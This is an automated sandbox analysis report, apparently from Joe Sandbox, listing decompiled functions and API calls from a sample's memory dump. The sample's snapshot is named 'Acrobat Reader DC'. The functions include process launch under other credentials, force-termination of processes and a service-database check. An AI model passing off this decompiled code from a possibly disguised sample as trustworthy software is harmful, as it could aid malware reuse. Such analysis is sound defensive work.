                                  • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                  • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E00436E94(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a20, void* _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                                  				int _v8;
                                  				signed char _t29;
                                  				intOrPtr _t31;
                                  				intOrPtr _t32;
                                  				int _t36;
                                  				signed int _t40;
                                  				void* _t53;
                                  				signed int _t56;
                                  
                                  				_t29 = _a16;
                                  				_t56 = _a24;
                                  				_t53 = 0;
                                  				_a16 = 0;
                                  				if((_t29 & 0x00000001) == 0) {
                                  					if((_t29 & 0x00000002) != 0) {
                                  						_t53 = 2;
                                  					}
                                  				} else {
                                  					_t53 = 1;
                                  				}
                                  				_t40 = 0;
                                  				if((_t29 & 0x00000004) == 0) {
                                  					L6:
                                  					_t31 = _a12;
                                  					__imp__CreateProcessWithLogonW(_a4, _a8, _t31, _t53, 0, _a20, _t56 | 0x00000400, _a16, _a28, _a32, _a36);
                                  					_t40 = _t40 & 0xffffff00 | _t31 != 0x00000000;
                                  					goto L7;
                                  				} else {
                                  					_a24 = 0;
                                  					_t36 = OpenProcessToken(GetCurrentProcess(), 0xa,  &_a24);
                                  					__imp__CreateEnvironmentBlock( &_a16, _a24, 1);
                                  					_v8 = _t36;
                                  					CloseHandle(_a24);
                                  					if(_v8 == 0) {
                                  						L7:
                                  						_t32 = _a16;
                                  						if(_t32 != 0) {
                                  							__imp__DestroyEnvironmentBlock(_t32);
                                  						}
                                  						return _t40;
                                  					}
                                  					goto L6;
                                  				}
                                  			}












                                  APIs
                                  • GetCurrentProcess.KERNEL32(0000000A,?), ref: 00436EC9
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00436ED0
                                  • CreateEnvironmentBlock.USERENV(?,?,00000001), ref: 00436EE0
                                  • CloseHandle.KERNEL32(?), ref: 00436EED
                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 00436F23
                                  • DestroyEnvironmentBlock.USERENV(?), ref: 00436F36
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                  • String ID:
                                  • API String ID: 1413079979-0
                                  • Opcode ID: c9cc6947404163de0e4cba86d071e92e41844a234d0bab68a120be017310f46c
                                  • Instruction ID: dd31e3d5ef53dadf09d6f4902918c4fef8fb0ebcc20249036383472598af8dfc
                                  • Opcode Fuzzy Hash: c9cc6947404163de0e4cba86d071e92e41844a234d0bab68a120be017310f46c
                                  • Instruction Fuzzy Hash: 10214C7620020AABDB14CF69DD59EEB37ADEB8D310F15851AFD05A3250C775EC12CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E004331A2(int __eax, signed long long __fp0, long _a4, signed short _a6) {
                                  				signed int _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				union _LARGE_INTEGER _v20;
                                  				union _LARGE_INTEGER _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				union _LARGE_INTEGER _v44;
                                  				signed int _t20;
                                  				long _t26;
                                  				long _t27;
                                  				signed long long _t28;
                                  
                                  				_t28 = __fp0;
                                  				_t13 = __eax;
                                  				_t26 = _a4;
                                  				_t27 = _t26;
                                  				if(_t27 < 0) {
                                  					return __eax;
                                  				} else {
                                  					if(_t27 != 0) {
                                  						if(_t26 >= 0xf) {
                                  							L8:
                                  							Sleep(_t26);
                                  							return _t13;
                                  						}
                                  						_t13 = QueryPerformanceCounter( &_v28);
                                  						if(_t13 == 0) {
                                  							goto L8;
                                  						}
                                  						QueryPerformanceFrequency( &_v44);
                                  						do {
                                  							Sleep(0);
                                  							QueryPerformanceCounter( &_v20);
                                  							asm("fnstcw word [ebp+0xa]");
                                  							asm("sbb ecx, [ebp-0x14]");
                                  							_v36 = _v20.LowPart - _v28.LowPart;
                                  							_v32 = _v16;
                                  							asm("fild qword [ebp-0x20]");
                                  							asm("fild qword [ebp-0x28]");
                                  							_t20 = _a6 & 0x0000ffff | 0x00000c00;
                                  							_v8 = _t20;
                                  							asm("fdivp st1, st0");
                                  							_t28 = _t28 *  *0x48cd40;
                                  							asm("fldcw word [ebp-0x4]");
                                  							asm("fistp qword [ebp-0x8]");
                                  							asm("fldcw word [ebp+0xa]");
                                  						} while (_v12 < _t26);
                                  						return _t20;
                                  					} else {
                                  						Sleep(0);
                                  						return _t13;
                                  					}
                                  				}
                                  			}
















                                  APIs
                                  • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                  • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                  • String ID:
                                  • API String ID: 2833360925-0
                                  • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                  • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                  • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                  • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00447275(struct HDC__* _a4, int _a8, int _a12, signed char _a16) {
                                  				void* _t10;
                                  				int _t19;
                                  				int _t22;
                                  				struct HDC__* _t24;
                                  
                                  				_t19 = _a8;
                                  				_t24 = _a4;
                                  				_t22 = _a12;
                                  				if((_a16 & 0x00000001) != 0) {
                                  					E0044719B(_t24, 0, 0xffffffff, 0, 1);
                                  					MoveToEx(_t24, _t19 - 2, _t22, 0);
                                  					LineTo(_t24, _t19 + 3, _t22);
                                  					MoveToEx(_t24, _t19, _t22 - 2, 0);
                                  					LineTo(_t24, _t19, _t22 + 3);
                                  					if( *0x4a86ec != 0) {
                                  						EndPath(_t24);
                                  						 *0x4a86ec = 0;
                                  					}
                                  					return StrokePath(_t24);
                                  				}
                                  				return _t10;
                                  			}








                                  APIs
                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                  • LineTo.GDI32(?,?,?), ref: 004472AC
                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                  • LineTo.GDI32(?,?,?), ref: 004472C6
                                  • EndPath.GDI32(?), ref: 004472D6
                                  • StrokePath.GDI32(?), ref: 004472E4
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                  • String ID:
                                  • API String ID: 372113273-0
                                  • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                  • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                  • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                  • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 59%
                                  			E0044CC51(void* __ebx, int _a4, int _a8) {
                                  				intOrPtr _v8;
                                  				void* __edi;
                                  				void* __esi;
                                  				int _t18;
                                  				intOrPtr* _t24;
                                  				int* _t29;
                                  				struct HDC__* _t34;
                                  
                                  				_t24 = _a8;
                                  				_t29 = _a4;
                                  				if(_t29 != 0) {
                                  					if(_t24 != 0) {
                                  						goto L2;
                                  					} else {
                                  						_push(0x80004003);
                                  						E004457C1();
                                  						asm("int3");
                                  						_push(_t33);
                                  						_push(_t29);
                                  						E00408F40(_v8, _v8 + 0x20);
                                  						return E00408F40(_t31, _t31);
                                  					}
                                  				} else {
                                  					_push(0x80004003);
                                  					E004457C1();
                                  					L2:
                                  					_t34 = GetDC(0);
                                  					_a8 = GetDeviceCaps(_t34, 0x58);
                                  					_a4 = GetDeviceCaps(_t34, 0x5a);
                                  					ReleaseDC(0, _t34);
                                  					 *_t24 = MulDiv(0x9ec,  *_t29, _a8);
                                  					_t18 = MulDiv(0x9ec, _t29[1], _a4);
                                  					 *(_t24 + 4) = _t18;
                                  					return _t18;
                                  				}
                                  			}











                                  APIs
                                  • GetDC.USER32(00000000), ref: 0044CC6D
                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                  • ReleaseDC.USER32 ref: 0044CC90
                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CapsDevice$Release
                                  • String ID:
                                  • API String ID: 1035833867-0
                                  • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                  • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                  • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                  • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 80%
                                  			E00417082(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				signed int _t15;
                                  				LONG* _t21;
                                  				void* _t29;
                                  				void* _t31;
                                  				LONG* _t33;
                                  				void* _t34;
                                  				void* _t35;
                                  
                                  				_t35 = __eflags;
                                  				_t29 = __edx;
                                  				_t25 = __ebx;
                                  				_push(0xc);
                                  				_push(0x48d0e8);
                                  				E00416C70(__ebx, __edi, __esi);
                                  				_t31 = E00417A69(__ebx, _t35);
                                  				_t15 =  *0x490800; // 0xfffffffe
                                  				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                  					E004182CB(_t25, _t31, 0xd);
                                  					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                  					_t33 =  *(_t31 + 0x68);
                                  					 *(_t34 - 0x1c) = _t33;
                                  					__eflags = _t33 -  *0x490708; // 0xa72c70
                                  					if(__eflags != 0) {
                                  						__eflags = _t33;
                                  						if(__eflags != 0) {
                                  							__eflags = InterlockedDecrement(_t33);
                                  							if(__eflags == 0) {
                                  								__eflags = _t33 - 0x4902e0;
                                  								if(__eflags != 0) {
                                  									E00413748(_t33);
                                  								}
                                  							}
                                  						}
                                  						_t21 =  *0x490708; // 0xa72c70
                                  						 *(_t31 + 0x68) = _t21;
                                  						_t33 =  *0x490708; // 0xa72c70
                                  						 *(_t34 - 0x1c) = _t33;
                                  						InterlockedIncrement(_t33);
                                  					}
                                  					 *(_t34 - 4) = 0xfffffffe;
                                  					E0041711D();
                                  				} else {
                                  					_t33 =  *(_t31 + 0x68);
                                  				}
                                  				_t38 = _t33;
                                  				if(_t33 == 0) {
                                  					_push(0x20);
                                  					E00411924(_t29, _t38);
                                  				}
                                  				return E00416CB5(_t33);
                                  			}











                                  APIs
                                  • __getptd.LIBCMT ref: 0041708E
                                    • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                    • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                  • __amsg_exit.LIBCMT ref: 004170AE
                                  • __lock.LIBCMT ref: 004170BE
                                  • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                  • _free.LIBCMT ref: 004170EE
                                  • InterlockedIncrement.KERNEL32(00A72C70), ref: 00417106
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                  • String ID:
                                  • API String ID: 3470314060-0
                                  • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                  • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                  • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                  • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00410AB0(intOrPtr* __esi) {
                                  				int _t20;
                                  
                                  				 *__esi = 5;
                                  				 *((intOrPtr*)(__esi + 4)) = 5;
                                  				 *((short*)(__esi + 8)) = 1;
                                  				 *((intOrPtr*)(__esi + 0x10)) = 0;
                                  				 *((intOrPtr*)(__esi + 0x14)) = 0;
                                  				 *((short*)(__esi + 0x18)) = 0;
                                  				 *((intOrPtr*)(__esi + 0x1a)) = 0;
                                  				 *((short*)(__esi + 0x1e)) = 0;
                                  				 *((intOrPtr*)(__esi + 0xc)) = 4;
                                  				 *((char*)(__esi + 0x29)) = MapVirtualKeyW(0x5b, 0);
                                  				 *((char*)(__esi + 0x26)) = MapVirtualKeyW(0x10, 0);
                                  				 *((char*)(__esi + 0x27)) = MapVirtualKeyW(0xa0, 0);
                                  				 *((char*)(__esi + 0x28)) = MapVirtualKeyW(0xa1, 0);
                                  				 *((char*)(__esi + 0x24)) = MapVirtualKeyW(0x11, 0);
                                  				_t20 = MapVirtualKeyW(0x12, 0);
                                  				 *(__esi + 0x25) = _t20;
                                  				return _t20;
                                  			}





                                  APIs
                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Virtual
                                  • String ID:
                                  • API String ID: 4278518827-0
                                  • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                  • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                  • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                  • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044B63B(intOrPtr _a4) {
                                  				void* _t6;
                                  				long _t8;
                                  				LONG* _t13;
                                  				intOrPtr _t17;
                                  				struct _CRITICAL_SECTION* _t18;
                                  				void** _t19;
                                  
                                  				_t17 = _a4;
                                  				_t19 = _t17 + 0x30;
                                  				if( *(_t17 + 0x30) != 0) {
                                  					_t13 = _t17 + 0x34;
                                  					_t8 = InterlockedExchange(_t13,  *(_t17 + 0x34));
                                  					if(_t8 != 0x1f6) {
                                  						_t18 = _t17 + 0x14;
                                  						EnterCriticalSection(_t18);
                                  						TerminateThread( *_t19, 0x1f6);
                                  						WaitForSingleObject( *_t19, 0x3e8);
                                  						E00432614(_t19);
                                  						_t8 = InterlockedExchange(_t13, 0x1f6);
                                  						LeaveCriticalSection(_t18);
                                  					}
                                  					return _t8;
                                  				}
                                  				return _t6;
                                  			}










                                  APIs
                                  • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                  • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                    • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                  • String ID:
                                  • API String ID: 3495660284-0
                                  • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                  • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                  • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                  • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00433FCE(struct HWND__* _a4) {
                                  				long _v8;
                                  				long _v12;
                                  				long _t7;
                                  				struct HWND__* _t14;
                                  				void* _t15;
                                  
                                  				_t14 = _a4;
                                  				PostMessageW(_t14, 0x10, 0, 0);
                                  				_t7 = SendMessageTimeoutW(_t14, 0x10, 0, 0, 2, 0x1f4,  &_v12);
                                  				if(_t7 == 0) {
                                  					GetWindowThreadProcessId(_t14,  &_v8);
                                  					_t15 = OpenProcess(0x1f0fff, 0, _v8);
                                  					TerminateProcess(_t15, 0);
                                  					return CloseHandle(_t15);
                                  				}
                                  				return _t7;
                                  			}









                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00433FDF
                                  • SendMessageTimeoutW.USER32 ref: 00433FF7
                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00434006
                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00434017
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00434022
                                  • CloseHandle.KERNEL32(00000000), ref: 00434029
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                  • String ID:
                                  • API String ID: 839392675-0
                                  • Opcode ID: 270ea397f99f845c81f96666f75a121d30ac61d95b76d5fc1fdfa9076574b2da
                                  • Instruction ID: 6d7c31bbfa6b3b8114dad7b7c2ee08b650c76bc0f6a005f10e60d9b42b3e3825
                                  • Opcode Fuzzy Hash: 270ea397f99f845c81f96666f75a121d30ac61d95b76d5fc1fdfa9076574b2da
                                  • Instruction Fuzzy Hash: 90F01D75681218BBE6215BA09D0AFEE776CAF09B01F104569FF01B61C1E7F42A0247AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00432FEE() {
                                  				void* _t3;
                                  				void* _t9;
                                  				void* _t11;
                                  
                                  				_t9 = 0;
                                  				_t11 = OpenSCManagerW(0, 0, 8);
                                  				if(_t11 == 0) {
                                  					L6:
                                  					return _t9;
                                  				} else {
                                  					_t3 = LockServiceDatabase(_t11);
                                  					if(_t3 == 0) {
                                  						if(GetLastError() == 0x41f) {
                                  							_t9 = 1;
                                  						}
                                  						CloseServiceHandle(_t11);
                                  						goto L6;
                                  					} else {
                                  						UnlockServiceDatabase(_t3);
                                  						CloseServiceHandle(_t11);
                                  						return 1;
                                  					}
                                  				}
                                  			}







                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A90E8,14000000,0042E252), ref: 00432FF8
                                  • LockServiceDatabase.ADVAPI32(00000000), ref: 00433005
                                  • UnlockServiceDatabase.ADVAPI32(00000000), ref: 00433010
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00433019
                                  • GetLastError.KERNEL32 ref: 00433024
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00433034
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                  • String ID:
                                  • API String ID: 1690418490-0
